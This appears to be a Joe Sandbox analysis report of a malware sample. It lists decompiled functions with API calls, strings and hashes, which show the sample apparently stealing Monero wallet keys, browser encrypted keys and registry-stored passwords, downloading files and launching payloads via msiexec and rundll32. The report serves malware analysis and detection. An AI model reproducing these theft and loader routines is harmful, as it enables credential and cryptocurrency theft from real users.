                    • Instruction ID: 1deea5e17f388ff86754500bfff3645bcd2969df3f19eb4eee7a682dc5d8ed89
                    • Opcode Fuzzy Hash: 7c5f9da36c351089d07c542df87d97c1abf862f284f4eb0dd52117be9c1aa1b1
                    • Instruction Fuzzy Hash: 9A41A6BA94020867D754F7B0EC47FED733AAB65705F004458B589660C1EEB49BCD8B93
                    Function 00649010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                    Download Yara Rule
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0064906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: image/jpeg
                    • API String ID: 2244384528-3785015651
                    • Opcode ID: 66de849d55882475984115713192380c30b4ed43ae5dd95cde36ea8c479be6a1
                    • Instruction ID: 99799d30d4eaf70e1ae8e4fa2299b1bc724bad45e0f47d5eaa7846b9e0b32c57
                    • Opcode Fuzzy Hash: 66de849d55882475984115713192380c30b4ed43ae5dd95cde36ea8c479be6a1
                    • Instruction Fuzzy Hash: 95710DB1910208ABDB08DFE4DC89FEEB7B9BF88700F148518F519A7294DB74E945CB61
                    Function 00642E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 006431C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 0064335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 006434EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: 63401d8df6736aa1fcaf0994b67f6e6985048e9b0b535f390b33478e82e3d067
                    • Instruction ID: cd37d483dfea07126c597eb30c7bdda657617bc67b54dcbcba24a3c87c87d8ba
                    • Opcode Fuzzy Hash: 63401d8df6736aa1fcaf0994b67f6e6985048e9b0b535f390b33478e82e3d067
                    • Instruction Fuzzy Hash: 6612FC71850108AAEB59EBE0DC92FEDB73AAF14300F50415DF50666191EF346B4ACFAA
                    Function 006452C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 00636280: InternetOpenA.WININET(00650DFE,00000001,00000000,00000000,00000000), ref: 006362E1
                      • Part of subcall function 00636280: StrCmpCA.SHLWAPI(?,014507B0), ref: 00636303
                      • Part of subcall function 00636280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00636335
                      • Part of subcall function 00636280: HttpOpenRequestA.WININET(00000000,GET,?,0144FDD8,00000000,00000000,00400100,00000000), ref: 00636385
                      • Part of subcall function 00636280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006363BF
                      • Part of subcall function 00636280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006363D1
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00645318
                    • lstrlen.KERNEL32(00000000), ref: 0064532F
                      • Part of subcall function 00648E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00648E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00645364
                    • lstrlen.KERNEL32(00000000), ref: 00645383
                    • lstrlen.KERNEL32(00000000), ref: 006453AE
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3240024479-1526165396
                    • Opcode ID: 7ed1381226f2e2d1b70fd176c87768fabd4d07888d8257debcd2bc3e7a4e4dc6
                    • Instruction ID: 76e974f2972750f151d33788e739e88f095dc5384d0f954a8ff9d3075835ac86
                    • Opcode Fuzzy Hash: 7ed1381226f2e2d1b70fd176c87768fabd4d07888d8257debcd2bc3e7a4e4dc6
                    • Instruction Fuzzy Hash: 0A512C70950108AFEB58FFA0C996AED377BEF11304F50401CF80A5A592EF346B46CBA6
                    Function 006412D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen
                    • String ID:
                    • API String ID: 2001356338-0
                    • Opcode ID: f131577186b836b25f0884f14027744e07734f36ce646becda3a20721b81749e
                    • Instruction ID: 1abfbe5ccc069f72284c62cda135f22393d3dfc07467cb0a0c7114e0dd21d87d
                    • Opcode Fuzzy Hash: f131577186b836b25f0884f14027744e07734f36ce646becda3a20721b81749e
                    • Instruction Fuzzy Hash: A2C1A4B5940109ABCB58EF60DC89FEE777ABF54304F00459CE50A67241DA70EAC5CFA5
                    Function 00644280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00648DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00648E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 006442EC
                    • lstrcat.KERNEL32(?,014503C0), ref: 0064430B
                    • lstrcat.KERNEL32(?,?), ref: 0064431F
                    • lstrcat.KERNEL32(?,0144DF10), ref: 00644333
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 00648D90: GetFileAttributesA.KERNEL32(00000000,?,00631B54,?,?,0065564C,?,?,00650E1F), ref: 00648D9F
                      • Part of subcall function 00639CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00639D39
                      • Part of subcall function 006399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                      • Part of subcall function 006399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                      • Part of subcall function 006399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                      • Part of subcall function 006399C0: ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                      • Part of subcall function 006399C0: LocalFree.KERNEL32(0063148F), ref: 00639A90
                      • Part of subcall function 006399C0: CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                      • Part of subcall function 006493C0: GlobalAlloc.KERNEL32(00000000,006443DD,006443DD), ref: 006493D3
                    • StrStrA.SHLWAPI(?,01450408), ref: 006443F3
                    • GlobalFree.KERNEL32(?), ref: 00644512
                      • Part of subcall function 00639AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639AEF
                      • Part of subcall function 00639AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00634EEE,00000000,?), ref: 00639B01
                      • Part of subcall function 00639AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639B2A
                      • Part of subcall function 00639AC0: LocalFree.KERNEL32(?,?,?,?,00634EEE,00000000,?), ref: 00639B3F
                    • lstrcat.KERNEL32(?,00000000), ref: 006444A3
                    • StrCmpCA.SHLWAPI(?,006508D1), ref: 006444C0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 006444D2
                    • lstrcat.KERNEL32(00000000,?), ref: 006444E5
                    • lstrcat.KERNEL32(00000000,00650FB8), ref: 006444F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 3541710228-0
                    • Opcode ID: 95af23a9af824e58bc03f106c8372abc6ff91d1149303f1b88d457493ff5c114
                    • Instruction ID: c46c264cae39aedbf792dbbd2dfaf37f51627d278db1ef6b27ee9631b9176154
                    • Opcode Fuzzy Hash: 95af23a9af824e58bc03f106c8372abc6ff91d1149303f1b88d457493ff5c114
                    • Instruction Fuzzy Hash: 757126B6900208BBDB54EBE4DC89FEE737ABB88300F044598F50997185DA74DB45CF96
                    Function 00631310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006312B4
                      • Part of subcall function 006312A0: RtlAllocateHeap.NTDLL(00000000), ref: 006312BB
                      • Part of subcall function 006312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006312D7
                      • Part of subcall function 006312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006312F5
                      • Part of subcall function 006312A0: RegCloseKey.ADVAPI32(?), ref: 006312FF
                    • lstrcat.KERNEL32(?,00000000), ref: 0063134F
                    • lstrlen.KERNEL32(?), ref: 0063135C
                    • lstrcat.KERNEL32(?,.keys), ref: 00631377
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 00648B60: GetSystemTime.KERNEL32(00650E1A,0144B8B0,006505AE,?,?,006313F9,?,0000001A,00650E1A,00000000,?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 00648B86
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00631465
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                      • Part of subcall function 006399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                      • Part of subcall function 006399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                      • Part of subcall function 006399C0: ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                      • Part of subcall function 006399C0: LocalFree.KERNEL32(0063148F), ref: 00639A90
                      • Part of subcall function 006399C0: CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 006314EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 3478931302-218353709
                    • Opcode ID: b960d2b755156fb68c3b9c4ab29ef022d30a861d30dfdc42b39957b39b7d4382
                    • Instruction ID: 446299b1cfaa527d9b96e250535cd2194b8842081d8ed40ae2985fcc0d39137e
                    • Opcode Fuzzy Hash: b960d2b755156fb68c3b9c4ab29ef022d30a861d30dfdc42b39957b39b7d4382
                    • Instruction Fuzzy Hash: 385146B1D501196BDB55FB60DD96BED733EEF54304F40419CB60A62082EE306B89CFAA
                    Function 006375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006372D0: memset.MSVCRT ref: 00637314
                      • Part of subcall function 006372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0063733A
                      • Part of subcall function 006372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006373B1
                      • Part of subcall function 006372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0063740D
                      • Part of subcall function 006372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00637452
                      • Part of subcall function 006372D0: HeapFree.KERNEL32(00000000), ref: 00637459
                    • lstrcat.KERNEL32(00000000,006517FC), ref: 00637606
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00637648
                    • lstrcat.KERNEL32(00000000, : ), ref: 0063765A
                    • lstrcat.KERNEL32(00000000,00000000), ref: 0063768F
                    • lstrcat.KERNEL32(00000000,00651804), ref: 006376A0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 006376D3
                    • lstrcat.KERNEL32(00000000,00651808), ref: 006376ED
                    • task.LIBCPMTD ref: 006376FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                    • String ID: :
                    • API String ID: 3191641157-3653984579
                    • Opcode ID: 204bdfca54cab389222fa9c808640e579d3fbe0492e48eea10d67e509590c1c3
                    • Instruction ID: 4c62296e68352a24aaafc58f82d3eaac415624c57bd68786e65f4a55372914c3
                    • Opcode Fuzzy Hash: 204bdfca54cab389222fa9c808640e579d3fbe0492e48eea10d67e509590c1c3
                    • Instruction Fuzzy Hash: 7A3170B1900109DFCB48EBE4DC5ADFF737ABB95302F144018F116A7254DA34E986CB96
                    Function 006372D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00637314
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0063733A
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006373B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0063740D
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00637452
                    • HeapFree.KERNEL32(00000000), ref: 00637459
                    • task.LIBCPMTD ref: 00637555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuememsettask
                    • String ID: Password
                    • API String ID: 2808661185-3434357891
                    • Opcode ID: 3eea008bd992d107b5be7b7dbeb3f230d53dd8c1d9cb542d47ec5fd08e9b900a
                    • Instruction ID: d0b9508c6172a6473505fa8b696d026bf01484b13e94e5a650da0ac9c02a46a6
                    • Opcode Fuzzy Hash: 3eea008bd992d107b5be7b7dbeb3f230d53dd8c1d9cb542d47ec5fd08e9b900a
                    • Instruction Fuzzy Hash: D4611DB590425C9BDB24DB50CD45BDAB7B9BF44300F0081E9E689A6141DF70ABC9CFE5
                    Function 006360A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00634839
                      • Part of subcall function 006347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00634849
                    • InternetOpenA.WININET(00650DF7,00000001,00000000,00000000,00000000), ref: 0063610F
                    • StrCmpCA.SHLWAPI(?,014507B0), ref: 00636147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0063618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006361B3
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 006361DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0063620A
